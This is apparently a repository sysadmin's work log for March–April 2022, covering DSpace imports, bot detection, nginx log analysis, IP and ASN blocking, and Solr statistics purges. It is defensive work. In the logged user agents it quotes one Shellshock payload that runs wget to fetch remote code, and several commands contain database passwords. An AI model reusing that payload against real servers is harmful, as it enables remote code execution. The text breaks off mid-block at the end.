March, 2022

2022-03-01

- Send Gaia the last batch of potential duplicates for items 701 to 980:

$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
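The csvjoin step matches rows on the shared id column from both files. The same idea can be sketched with GNU coreutils join on two tiny, hypothetical CSVs (csvkit handles quoting and unsorted input, which plain join does not):

```sh
# Hypothetical miniature of the csvjoin step: both files share an "id"
# column, and the join yields one row per id with columns from both files.
cat > /tmp/dupes.csv <<'EOF'
id,match
12,10568/1111
34,10568/2222
EOF
cat > /tmp/names.csv <<'EOF'
id,filename
12,report.pdf
34,brief.pdf
EOF
# GNU join: -t, sets the delimiter; --header passes the header line through
join -t, --header /tmp/dupes.csv /tmp/names.csv
```

This prints a joined header plus one combined row per id.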
2022-03-04

- Looking over the CGSpace Solr statistics from 2022-02

- I see a few new bots, though once I expanded my search for user agents with “www” in the name I found so many more!
- Here are some of the more prevalent or weird ones:
- axios/0.21.1
- Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
- Nutraspace/Nutch-1.2 (www.nutraspace.com)
- Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
- Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
- Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
- Crowsnest/0.5 (+http://www.crowsnest.tv/)
- Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
- metha/0.2.27
- ZaloPC-win32-24v454
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
- ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
- FullStoryBot/1.0 (+https://www.fullstory.com)
- Link Validity Check From: http://www.usgs.gov
- OSPScraper (+https://www.opensyllabusproject.org)
- () { :;}; /bin/bash -c "wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832"

- I submitted a pull request to COUNTER-Robots with some of these
- I purged a bunch of hits from the stats using the check-spider-hits.sh script:
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 6 hits from scalaj-http in statistics
Purging 5 hits from lua-resty-http in statistics
Purging 9 hits from AHC in statistics
Purging 7 hits from acebookexternalhit in statistics
Purging 1011 hits from axios\/[0-9] in statistics
Purging 2216 hits from Faveeo\/[0-9] in statistics
Purging 1164 hits from Moreover\/[0-9] in statistics
Purging 740 hits from Exploratodo\/[0-9] in statistics
Purging 585 hits from GroupHigh\/[0-9] in statistics
Purging 438 hits from Crowsnest\/[0-9] in statistics
Purging 1326 hits from nbertaupete95 in statistics
Purging 182 hits from metha\/[0-9] in statistics
Purging 68 hits from ZaloPC-win32-24v454 in statistics
Purging 1644 hits from Firefox\/x\.x in statistics
Purging 678 hits from ZoteroTranslationServer in statistics
Purging 27 hits from FullStoryBot in statistics
Purging 26 hits from Link Validity Check in statistics
Purging 26 hits from OSPScraper in statistics
Purging 1 hits from 3137382e37392e3138372e313832 in statistics
Purging 2755 hits from Nutch-[0-9] in statistics

Total number of bot hits purged: 12914
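The purge patterns above are regular expressions matched against the stored user agent. A quick local sanity check of a few of them (the backslash before the slash is only needed in the Solr query, not in grep):

```sh
# Sample agents from the list above, plus one normal browser agent
cat > /tmp/agents.txt <<'EOF'
axios/0.21.1
Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
Nutraspace/Nutch-1.2 (www.nutraspace.com)
metha/0.2.27
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
EOF
# Four of the five lines should match the bot patterns, and the
# plain browser agent should not
grep -c -E 'axios/[0-9]|Faveeo/[0-9]|Nutch-[0-9]|metha/[0-9]' /tmp/agents.txt
```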
- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project

2022-03-05

- Start AReS harvest
2022-03-10

- A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701–980 in the spreadsheet)

- I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:
or(
isNotNull(value.match('707')),
isNotNull(value.match('709')),
isNotNull(value.match('710')),
isNotNull(value.match('711')),
isNotNull(value.match('713')),
isNotNull(value.match('717')),
isNotNull(value.match('718')),
...
isNotNull(value.match('821'))
)

- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:

$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-10-tac-batch4-701to980.map
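The GREL facet above is just membership testing on the id column. A rough shell equivalent with awk, using hypothetical file names and a shortened id list:

```sh
# The delete list (a few of the ids from the facet above)
cat > /tmp/delete-ids.txt <<'EOF'
707
709
710
EOF
# A miniature item export with an id column
cat > /tmp/items.csv <<'EOF'
id,title
706,Keep this one
707,Flag for deletion
710,Flag for deletion
EOF
# NR==FNR while reading the id list; then print CSV rows whose id matches
awk -F, 'NR==FNR { ids[$1]; next } $1 in ids' /tmp/delete-ids.txt /tmp/items.csv
```

This prints only the two rows whose id is in the delete list.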
2022-03-12

- Update all containers and rebuild OpenRXV on linode20:

$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
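The pull pipeline above munges `docker images` output into repo:tag pairs. The text-munging part can be simulated on a fake header plus two image rows (no Docker needed):

```sh
# Fake `docker images` output: a header plus two image rows
printf '%s\n' \
  'REPOSITORY          TAG       IMAGE ID' \
  'nginx               latest    abc123' \
  'redis               6-alpine  def456' \
  | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2
```

Each run of spaces becomes a colon, and cut keeps the first two fields, yielding `nginx:latest` and `redis:6-alpine`, which xargs then feeds to `docker pull` one at a time.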
- Then run all system updates and reboot
- Start a full harvest on AReS

2022-03-16

- Meeting with KM/KS group to start talking about the way forward for repositories and web publishing

- We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing

2022-03-20

- Start a full harvest on AReS

2022-03-21
- Review a few submissions for Open Repositories 2022
- Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed

2022-03-22

- I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there

- I had been meaning to update my local database…

- I re-imported the CGIAR CAS documents to DSpace Test and generated the PDF thumbnails:

$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-22-tac-700.map
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10568/118432
- On my local environment I decided to run the check-duplicates.py script one more time with all 700 items:

$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-03-22-tac-duplicates.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
- I sent the resulting 76 items to Gaia to check
- UptimeRobot said that CGSpace was down

- I looked and found many locks belonging to the REST API application:

$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
  301 dspaceWeb
 2390 dspaceApi
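The lock-count pipeline simply tallies how many lock rows belong to each JDBC user. Here is the `grep -o` / `sort` / `uniq -c` idiom on canned input:

```sh
# Each matching token becomes its own output line (-o),
# then sort | uniq -c tallies the occurrences
printf '%s\n' 'lock a dspaceWeb' 'lock b dspaceApi' 'lock c dspaceApi' \
  | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
```

This prints a count of 1 for dspaceWeb and 2 for dspaceApi, smallest first.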
- Looking at nginx’s logs, I found the top addresses making requests today:

# awk '{print $1}' /var/log/nginx/rest.log | sort | uniq -c | sort -h
 1977 45.5.184.2
 3167 70.32.90.172
 4754 54.195.118.125
 5411 205.186.128.185
 6826 137.184.159.211
- 137.184.159.211 is on DigitalOcean using this user agent: GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28
- I blocked this IP in nginx and the load went down immediately
- 205.186.128.185 is on Media Temple, but it’s OK because it’s the CCAFS publications importer bot
- 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)
- 70.32.90.172 is on Media Temple and has no user agent
- What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
- I verified that it works as expected with an empty user agent:

$ curl -H User-Agent:'' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'
Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
- I note that the nginx log shows ‘-’ for a request with an empty user agent, which makes it indistinguishable from a request whose user agent is a literal ‘-’; for example, these requests were successful:

70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"

- I can only assume that these requests used a literal ‘-’ so I will have to add an nginx rule to block those too
- Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester… I should ask Macaroni Bros about that

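A rule for the literal ‘-’ agent could extend the existing empty-agent check. A minimal sketch (not our actual config; the variable name is an assumption) using an nginx map:

```nginx
# Flag both an empty user agent and a literal "-"
map $http_user_agent $bad_user_agent {
    default 0;
    ""      1;
    "-"     1;
}

# Then, inside the server/location block:
# if ($bad_user_agent) { return 403; }
```

A map is evaluated lazily and avoids stacking several `if` checks in the location block.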
2022-03-24

- Maria from ABC asked about a reporting discrepancy on AReS

- I think it’s because the last harvest was over the weekend, and she was expecting to see items submitted this week

- Paola from ABC said they are decommissioning the server where many of their library PDFs are hosted

- She asked if we can download them and upload them directly to CGSpace

- I re-created my local Artifactory container
- I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately

- One thing I realized is that OAI is no longer a standalone web application, it is part of the server app now: http://localhost:8080/server/oai/request?verb=Identify
- Deploy PostgreSQL 12 on CGSpace (linode18) but don’t switch over yet, because I see some users active

- I did this on DSpace Test in 2022-02 so I just followed the same procedure
- After that I ran all system updates and rebooted the server
2022-03-25

- Looking at the PostgreSQL database size on CGSpace after the update yesterday:

- The space saving in indexes of recent PostgreSQL releases is awesome!
- Import a DSpace 6.x database dump from production into my local DSpace 7 database

- I still see the same errors I saw in 2021-04 when testing DSpace 7.0 beta 5
- I had to delete some old migrations, as well as all Atmire ones, first:

localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';

- Then I was able to migrate to DSpace 7 with dspace database migrate ignored as the DSpace upgrade notes say

- I see that the flash of unstyled content bug still exists on dspace-angular… ouch!

- Start a harvest on AReS
2022-03-26

- Update dspace-statistics-api to Falcon 3.1.0 and release v1.4.3

2022-03-28

- Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
- I added the account to the Alliance Admins group, which should allow him to submit to any Alliance collection

- According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API

- Abenet and I noticed 1,735 items in CTA’s community that have the title “delete”

- We asked Peter and he said we should delete them
- I exported the CTA community metadata and used OpenRefine to filter all items with the “delete” title, then used the “expunge” bulkedit action to remove them

- I realized I forgot to clean up the old Let’s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago

- I also removed the pre-Ubuntu 20.04 Let’s Encrypt stuff from the Ansible infrastructure playbooks
2022-03-29

- Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents

- I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:

or(
isNotNull(value.match('33')),
isNotNull(value.match('179')),
isNotNull(value.match('452')),
isNotNull(value.match('489')),
isNotNull(value.match('541')),
isNotNull(value.match('568')),
isNotNull(value.match('646')),
isNotNull(value.match('889'))
)

- Then I flagged all matching records, exported a CSV to use with SAFBuilder, imported the 692 items to CGSpace, and generated the thumbnails:

$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
$ dspace import --add --eperson=umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-29-cgiar-tac.map
$ chrt -b 0 dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10947/50

- After that I did some normalization on the cg.subject.system metadata and extracted a few dozen countries to the country field
- Start a harvest on AReS
2022-03-30

- Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well:

$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuu'

- I started looking into the request regarding the CIAT Library PDFs

- There are over 4,000 links to PDFs hosted on that server in CGSpace metadata
- The links seem to be down though! I emailed Paola to ask
2022-03-31

- Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC
- I will do the following for CMS and G1GC on DSpace Test:

- Wait for startup
- Reload home page
- Log in
- Do a search for “livestock”
- Click AGROVOC facet for livestock
- dspace index-discovery -b
- dspace-statistics-api index

- With CMS the Discovery Index took:

real    379m19.245s
user    267m17.704s
sys     4m2.937s
- Leroy from CIAT said that the CIAT Library server has security issues and was therefore limited to internal traffic

- I extracted a list of URLs from CGSpace to send him:

localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
COPY 4552
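The `https?://ciat-library` pattern in the \COPY query is a POSIX regular expression. The same match can be checked with grep on a few made-up metadata values:

```sh
# Two ciat-library URLs (hypothetical paths) and one unrelated handle URL;
# "https?" makes the trailing s optional, so both schemes match
printf '%s\n' \
  'http://ciat-library.example.org/articulos/one.pdf' \
  'https://ciat-library.example.org/two.pdf#page=12' \
  'https://hdl.handle.net/10568/12345' \
  | grep -c -E 'https?://ciat-library'
```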
- I did some checks and cleanups in OpenRefine because there are some values with “#page” etc

- Once I sorted them there were only ~2,700 unique URLs, which means there are going to be almost two thousand items with duplicate PDFs
- I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books
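The cleanup was done in OpenRefine, but the idea is stripping URL fragments before de-duplicating. A sed sketch with hypothetical URLs:

```sh
# Strip "#page=NN" fragments, then count distinct URLs:
# three input lines collapse to one unique PDF
printf '%s\n' \
  'https://example.org/book.pdf#page=33' \
  'https://example.org/book.pdf#page=70' \
  'https://example.org/book.pdf' \
  | sed 's/#page=[0-9]*$//' | sort -u | wc -l
```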
April, 2022

2022-04-01

- I did G1GC tests on DSpace Test (linode26) to complement the CMS tests I did yesterday

- The Discovery indexing took this long:

real    334m33.625s
user    227m51.331s
sys     3m43.037s
2022-04-04

- Start a full harvest on AReS
- Help Marianne with submit/approve access on a new collection on CGSpace
- Go back in Gaia’s batch reports to find records that she indicated for replacing on CGSpace (i.e., those with better new copies, new versions, etc)
- Looking at the Solr statistics for 2022-03 on CGSpace

- I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: Apache-HttpClient/4.5.9 (Java/1.8.0_322), and many others with a normal browser agent, so that’s fishy!
- The DSpace agent pattern http.?agent seems to have caught the first ones, but I’ll purge the IP ones
- I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for dns:*msnbot* AND dns:*.msn.com. I see over 100,000 hits, which is a problem I noticed a few months ago too…
- I extracted the MSN Bot IPs from Solr using an IP facet, then used the check-spider-ip-hits.sh script to purge them
2022-04-10

- Start a full harvest on AReS

2022-04-13

- UptimeRobot mailed to say that CGSpace was down

- I looked and found the load at 44…

- There seem to be a lot of locks from the XMLUI:

$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
 3173 dspaceWeb

- Looking at the top IPs in nginx’s access log one IP in particular stands out:

  941 66.249.66.222
 1224 95.108.213.28
 2074 157.90.209.76
 3064 66.249.66.221
95743 185.192.69.15

- 185.192.69.15 is in the UK
- I added a block for that IP in nginx and the load went down…

2022-04-16

- Start harvest on AReS

2022-04-18

- I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I’m on holiday out of the country for Easter)

- I see there are many locks in use from the XMLUI:

$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
 8932 dspaceWeb

- Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:

# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort | uniq -c | sort -h
  752 69.162.124.231
  759 66.249.64.213
  864 66.249.66.222
  905 2a01:4f8:221:f::2
 1013 84.33.2.97
 1201 157.55.39.159
 1204 157.55.39.144
 1209 157.55.39.102
 1217 157.55.39.161
 1252 207.46.13.177
 1274 157.55.39.162
 2553 66.249.66.221
 2941 95.108.213.28
- One IP is using a strange user agent though:

84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] "GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
- Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and the log file rolled over at 00:00):

# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
17314

- That’s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each

- The ISPs I’ve seen so far are ChinaNet and China Unicom

- I extracted all the IPs from today and resolved them:

# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq > /tmp/2022-04-18-ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv

- The top ASNs by IP are:

$ csvcut -c 2 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
  102 GOOGLE
  139 Maxihost LTDA
  165 AMAZON-02
  393 "China Mobile Communications Group Co., Ltd."
  473 AMAZON-AES
  616 China Mobile communications corporation
  642 M247 Ltd
 2336 HostRoyale Technologies Pvt Ltd
 4556 Chinanet
 5527 CHINA UNICOM China169 Backbone
$ csvcut -c 4 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
  139 262287
  165 16509
  180 204287
  393 9808
  473 14618
  615 56041
  642 9009
 2156 203020
 4556 4134
 5527 4837

- I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and the HTML sitemap etc
- I will download the IP blocks for each ASN except Google and Amazon and ban them

$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
20296

- I extracted the IPv4 and IPv6 networks:

$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep ":" | sort > /tmp/ipv6-networks.txt
$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep -v ":" | sort > /tmp/ipv4-networks.txt

- I suspect we need to aggregate these networks since there are so many and nftables doesn’t like it when they overlap:

$ wc -l /tmp/ipv4-networks.txt
15464 /tmp/ipv4-networks.txt
$ aggregate6 /tmp/ipv4-networks.txt | wc -l
2781
$ wc -l /tmp/ipv6-networks.txt
4833 /tmp/ipv6-networks.txt
$ aggregate6 /tmp/ipv6-networks.txt | wc -l
338

- I deployed these lists on CGSpace, ran all updates, and rebooted the server

- This list is SURELY too broad because we will block legitimate users in China… but right now how can I discern?
- Also, I need to purge the hits from these 14,000 IPs in Solr when I get time

- Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:

- I used grepcidr with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:

# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort -u > /tmp/ips.log
# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv4-ips.txt; done < /tmp/ipv4-networks-aggregated.txt
# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv6-ips.txt; done < /tmp/ipv6-networks-aggregated.txt
# wc -l /tmp/ipv4-ips.txt
15313 /tmp/ipv4-ips.txt
# wc -l /tmp/ipv6-ips.txt
19 /tmp/ipv6-ips.txt

- Then I purged them from Solr using the check-spider-ip-hits.sh script:

$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
2022-04-23

- A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the example file that contains most patterns

- I updated CGSpace, then ran all system updates and rebooted the host
- I also ran dspace cleanup -v to prune the database
2022-04-24

- Start a harvest on AReS

2022-04-25

- Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have

- There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can’t
- I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete
- I notice we have over 1,000 items with region Africa South of Sahara

- I am surprised to see these because we did a mass migration to Sub-Saharan Africa in 2020-10 when we aligned to UN M.49
- Oh! It seems I used a capital O in Of!
- This is curious, I see we missed East Asia and North America, because those are still in our list, but UN M.49 uses Eastern Asia and Northern America… I will have to raise that with Peter and Abenet later
- For now I will just re-run my fixes:

$ cat /tmp/regions.csv
cg.coverage.region,correct
East Africa,Eastern Africa
West Africa,Western Africa
Southeast Asia,South-eastern Asia
South Asia,Southern Asia
Africa South of Sahara,Sub-Saharan Africa
North Africa,Northern Africa
West Asia,Western Asia
$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 227 -t correct

- Then I started a new harvest on AReS
2022-04-27

- I woke up to many up/down notices for CGSpace from UptimeRobot

- The server has load 111.0… sigh.

- According to Grafana it seems to have started at 4:00 AM
+- There are a metric fuck ton of database locks from the XMLUI:
+
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
+ 128 dspaceApi
+ 16890 dspaceWeb
+
+- As for the server logs, I don’t see many IPs connecting today:
+
+# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
+2924
+
+- But there appear to be some IPs making many requests:
+
+# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
+...
+ 345 207.46.13.53
+ 646 66.249.66.222
+ 678 54.90.79.112
+ 1529 136.243.148.249
+ 1797 54.175.8.110
+ 2304 174.129.118.171
+ 2523 66.249.66.221
+ 2632 52.73.204.196
+ 2667 54.174.240.122
+ 5206 35.172.193.232
+ 5646 35.153.131.101
+ 6373 3.85.92.145
+ 7383 34.227.10.4
+ 8330 100.24.63.172
+ 8342 34.236.36.176
+ 8369 44.200.190.111
+ 8371 3.238.116.153
+ 8391 18.232.101.158
+ 8631 3.239.81.247
+ 8634 54.82.125.225
+
+- 54.82.125.225, 3.239.81.247, 18.232.101.158, 3.238.116.153, 44.200.190.111, 34.236.36.176, 100.24.63.172, 3.85.92.145, 35.153.131.101, 35.172.193.232, 54.174.240.122, 52.73.204.196, 174.129.118.171, 54.175.8.110, and 54.90.79.112 are all on Amazon and using this normal-looking user agent:
+
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
+
+- None of these hosts are re-using their DSpace session IDs, so they are definitely not the normal browsers they claim to be:
+
+$ grep 54.82.125.225 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5760
+$ grep 3.239.81.247 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+6053
+$ grep 18.232.101.158 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5841
+$ grep 3.238.116.153 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5887
+$ grep 44.200.190.111 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+5899
+...
+
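+- Rather than grepping each IP by hand, the session check can be looped over the IP list; a sketch against a fabricated two-line sample log in the same format (the real file is dspace.log.2022-04-27):

```shell
# Fabricated sample in the dspace.log session format (real log not included here)
cat > /tmp/dspace-sample.log <<'EOF'
2022-04-27 04:01:02 session_id=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:ip_addr=54.82.125.225
2022-04-27 04:01:03 session_id=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB:ip_addr=54.82.125.225
EOF

# One unique session per request means the client is not re-using sessions
for ip in 54.82.125.225; do
    count=$(grep "$ip" /tmp/dspace-sample.log \
        | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort -u | wc -l)
    echo "$ip: $count sessions"
done
```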
+- And we can see a massive spike in sessions in Munin:
+
+
+
+- I see the following IPs using that user agent today:
+
+# grep 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
+ 678 54.90.79.112
+ 1797 54.175.8.110
+ 2697 174.129.118.171
+ 2765 52.73.204.196
+ 3072 54.174.240.122
+ 5206 35.172.193.232
+ 5646 35.153.131.101
+ 6783 3.85.92.145
+ 7763 34.227.10.4
+ 8738 100.24.63.172
+ 8748 34.236.36.176
+ 8787 3.238.116.153
+ 8794 18.232.101.158
+ 8806 44.200.190.111
+ 9021 54.82.125.225
+ 9027 3.239.81.247
+
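+- The IP list for the firewall and the purge script can be cut straight out of that `uniq -c` output; a sketch on two sample lines (the real list went to /tmp/ips.txt):

```shell
# Sample of the `sort | uniq -c | sort -h` output shown above
cat > /tmp/ua-counts.txt <<'EOF'
    678 54.90.79.112
   9027 3.239.81.247
EOF

# Keep only the IP column (field 2 after awk's default whitespace splitting)
awk '{print $2}' /tmp/ua-counts.txt > /tmp/ips-sample.txt
cat /tmp/ips-sample.txt
```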
+- I added those IPs to the firewall and then purged their hits from Solr:
+
+$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+Purging 6024 hits from 100.24.63.172 in statistics
+Purging 1719 hits from 174.129.118.171 in statistics
+Purging 5972 hits from 18.232.101.158 in statistics
+Purging 6053 hits from 3.238.116.153 in statistics
+Purging 6228 hits from 3.239.81.247 in statistics
+Purging 5305 hits from 34.227.10.4 in statistics
+Purging 6002 hits from 34.236.36.176 in statistics
+Purging 3908 hits from 35.153.131.101 in statistics
+Purging 3692 hits from 35.172.193.232 in statistics
+Purging 4525 hits from 3.85.92.145 in statistics
+Purging 6048 hits from 44.200.190.111 in statistics
+Purging 1942 hits from 52.73.204.196 in statistics
+Purging 1944 hits from 54.174.240.122 in statistics
+Purging 1264 hits from 54.175.8.110 in statistics
+Purging 6117 hits from 54.82.125.225 in statistics
+Purging 486 hits from 54.90.79.112 in statistics
+
+Total number of bot hits purged: 67229
+
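+- The script's reported total can be cross-checked by summing the per-IP lines with awk:

```shell
# The sixteen per-IP purge lines from check-spider-ip-hits.sh above
cat > /tmp/purge.log <<'EOF'
Purging 6024 hits from 100.24.63.172 in statistics
Purging 1719 hits from 174.129.118.171 in statistics
Purging 5972 hits from 18.232.101.158 in statistics
Purging 6053 hits from 3.238.116.153 in statistics
Purging 6228 hits from 3.239.81.247 in statistics
Purging 5305 hits from 34.227.10.4 in statistics
Purging 6002 hits from 34.236.36.176 in statistics
Purging 3908 hits from 35.153.131.101 in statistics
Purging 3692 hits from 35.172.193.232 in statistics
Purging 4525 hits from 3.85.92.145 in statistics
Purging 6048 hits from 44.200.190.111 in statistics
Purging 1942 hits from 52.73.204.196 in statistics
Purging 1944 hits from 54.174.240.122 in statistics
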